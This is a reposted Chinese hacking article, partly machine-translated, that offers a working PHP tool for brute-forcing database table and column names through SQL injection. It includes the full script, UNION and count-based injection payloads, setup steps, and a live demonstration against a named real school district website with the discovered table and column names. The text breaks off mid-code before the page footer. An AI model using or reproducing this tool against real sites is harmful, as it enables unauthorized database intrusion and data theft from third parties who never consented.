do all things in php (injection application writing)

文章作者：mika[EST]
信息来源：邪恶八进制信息安全团队

最近俺又迷恋上脚本了，嘿嘿~~~刚学完PHP然后又看了些PHP安全方面的文章，于是乎从google中找了几个站练习一下。
结果发现php猜表名和列名真的很费劲啊，nbsi这类的扫描工具有没有那种用字典或者暴力猜解表名和列名的功能，难不成还得自己一个一个猜啊？我很懒的：-）
突然想到自己不是刚刚学完PHP吗？为什么不学以致用呢？php不光是一个web脚本语言，它还是一个非常棒的命令行解释语言，用它写脚本好方便的哦。为了以后能够碰到这类问题省点劲俺就写了一个php脚本用来猜表和列名的。脚本写的很简单，内容如下：
echo " Universal Database tables explode exploit V0.1 ";
echo " Written by Mika[EST] ";
//$keyword="Warning";
$keyword="error";
switch($argc){
case 3:
$u=" and (select count(*) from MIKA_NAME)>0";
$dic=$argv[2];
break;
case 4:
$u=" and 1=1 union select ".implode(,,range(1,$argv[2]))." from MIKA_NAME#";
$dic=$argv[3];
break;
case 5:
if($argv[2]!="-t")
exit("arguments Error");
$u=" and (select count(MIKA_NAME) from $argv[3])>0#";
$dic=$argv[4];
break;
case 6:
if($argv[2]!="-t" || $argv[4]<1)
exit("arguments Error");
if($argv[4]>=2){
$u=" and 1=1 union select ".MIKA_NAME.,.implode(,,range(2,$argv[4]))." from $argv[3]#";
}else{
$u=" and 1=1 union select MIKA_NAME from $argv[3]#";
}
$dic=$argv[5];
break;
default:
echo << Usage:$argv[0] [OPTIONS]
OPTIONS: number --->to indicate column number of a table during a union query

e.g:$argv[0] [url]http://www.aaa.com/bbb.asp?ccc=56[/url] 3 mydict.txt

the url will be like:.../bbb.asp?ccc=56 and 1=2 union select 1,2,3 from admin

OPTIONS: -t

[number] ---> to explode column name of the

e.g:$argv[0] [url]http://www.aaa.com/bbb.asp?ccc=56[/url] -t admin mydict.txt

Attention:if you dont use [options] the program will use default mode to work.you can change it in the source code of this program.
USAGE;
die;
}

$old=$argv[1];
file_exists($dic) or exit("dic file does not exist! ");
$words=file($dic);
$curl=curl_init();
curl_setopt($curl,CURLOPT_HEADER,0);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_PROXY,"127.0.0.1:8080");
print "[+]Searching What you want... ";
foreach($words as $word){
//print $word;
if(preg_match("/^s$/",$word)){
//print "blank";
continue;
}
$url=str_replace(MIKA_NAME,trim($word),$u);
$url=$old.urlencode($url);
//$url=$old.$url;
curl_setopt($curl,CURLOPT_URL,$url);
//print "source url is:".$url." ";
$content=curl_exec($curl);
//$new=$content;
//print $content;
if(preg_match("/$keyword/i",$content)==0){
print "[*] FOUND:".trim($word);
}
else{print ".";}
}
?>
俺先解释一下吧：程序里用到的模块是curl，它用来获取网页内容是非常方便的。我的这个php是for windows的，所以里面集成了很多的模块。但是curl默认是不启用的，你需要开启它哦。方法很简单，去网上下载php最新版本的绿色版（不需要安装的，方便携带），然后将压缩包内的php.ini-recommended复制到系统目录（win2k是winnt目录，xp等的是windows目录）并将其改名为php.ini，然后用记事本打开，找到如下一行：
extension_dir =
把它的值设置成你自己的，比如把压缩包接压到了c：php里，那么你需要把它设置成：
extension_dir = "c:phpext"

然后再继续找到下面这段：
; Windows Extensions
; Note that ODBC support is built in, so no dll is needed for it.
; Note that many DLL files are located in the extensions/ (PHP 4) ext/ (PHP 5)
; extension folders as well as the separate PECL DLL download (PHP 5).
; Be sure to appropriately set the extension_dir directive.

;extension=php_mbstring.dll
;extension=php_bz2.dll
;extension=php_curl.dll
;extension=php_dba.dll
;extension=php_dbase.dll
;extension =php_exif.dll
;extension=php_fdf.dll
;extension=php_filepro.dll
;extension=php_gd2.dll
;extension=php_gettext.dll
;extension=php_ifx.dll
See php_curl.dll? Just remove the semicolon in front of it. Then save it. It’s not over yet. Go to the php directory and find these two files:
libeay32.dll
ssleay32.dll

Copy them to the system32 directory and it will be OK. Very simple, right? Then set the path of your php in the environment variable, so that you can directly call php.exe for parsing in any directory. The steps for installing other modules are similar, so I won’t go into details :-)

Getting back to the subject, you can use the curl module by following the above steps. The usage of the program is very simple. For example, the injected URL is like this: http://www.aaa.com/bbb.asp?ccc=56, and your dictionary file is in the current directory mydict.txt. Then the method of using this program is:
php explode.php http://www.aaa.com/bbb.asp?ccc=56 mydict.txt

It should be noted that since this program is originally used by myself, the program does not consider many things. The program makes judgments based on the content returned by the page, so you must first obtain it manually. For example, you can do this:
http://www.aaa.com/bbb.asp?ccc=56 and (select count(*) from mika520)>0 (on access and mssql)
or
http://www.aaa.com/bbb.asp?ccc=56 and 1=1 union select 1,2, 3,4,5,6 from mika520%23 (mysql)

The mika520 is a table that does not exist. After returning the page, you can check the source code and find a statement that does not exist in the correct page as a keyword (injection tools such as nbsi use the correct page by default) As a judgment, I did the opposite :-), and then replace the value of $keyword in line 4 of the program code with your keyword. For example, this site:
http://www.elkhart.k12.in.us/content.php?id=157

Since it is PHP, you have to use the second way to guess, that is, you need to use a joint query, so first determine whether the injection point exists, and then use order by to determine the number of fields. I am judging 5 fields here. , after making the judgment, you can use my program to guess. The results are as follows:
F:scriptsphpmine>php forcetb1.php http://www.elkhart.k12.in.us/content.php?id
=157 5 mydict.txt
Universal Database tables explode exploit V0.1

Written by Mika[EST]

[+]Searching What you want...
...[*] FOUND:structure........................ ................................
Did you see it? Found a watch, haha. Let’s take a look at the fields:
F:scriptsphpmine>php forcetb1.php http://www.elkhart.k12.in.us/content.php?id
=157 -t structure 5 temp.txt
Universal Database tables explode exploit V0.1

Written by Mika[EST]

[+]Searching What you want...
[*] FOUND:division......[*] FOUND:id.[*] FOUND:level.......... [*] FOUND:title....
..[*] FOUND:content..[*] FOUND:parent_id....
Very simple, right? The 5 in the command is the number of fields you guessed using order by. Just replace it with the actual number. If it is an access or mssql database, just remove the parameter of the number of fields (ie 5 in the example). I won’t do more demonstrations.

If you encounter problems while using it, you can change the code yourself, it’s very simple:-)

In addition, my program uses HTTP proxy by default, so you need to modify this line:
curl_setopt($curl,CURLOPT_PROXY,"127.0.0.1:8080");

Just replace it with your proxy. If you don’t need a proxy, just comment it out.

Actually, guess what, the key is to see if your dictionary is powerful enough. You can just combine your common dictionaries. For example, just take the dictionaries of NBSI and Kuangzhugang, and then compose them into a file. However, these two dictionaries may have many duplicates. In order to save unnecessary guessing, they need to be repeated everywhere. I have written a very simple program in PHP to help you remove duplicate rows, as follows:

if($argc!=2){
echo << Write

Related labels：

php author information Octal use team Safety article source injection program write

source：php.cn

Previous article：PHP5.0 Object Model Exploration Overloading_PHP Tutorial Next article：Determine whether the string emailAddr is a legal email format_PHP tutorial

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

do all things in php (injection application writing)_PHP tutorial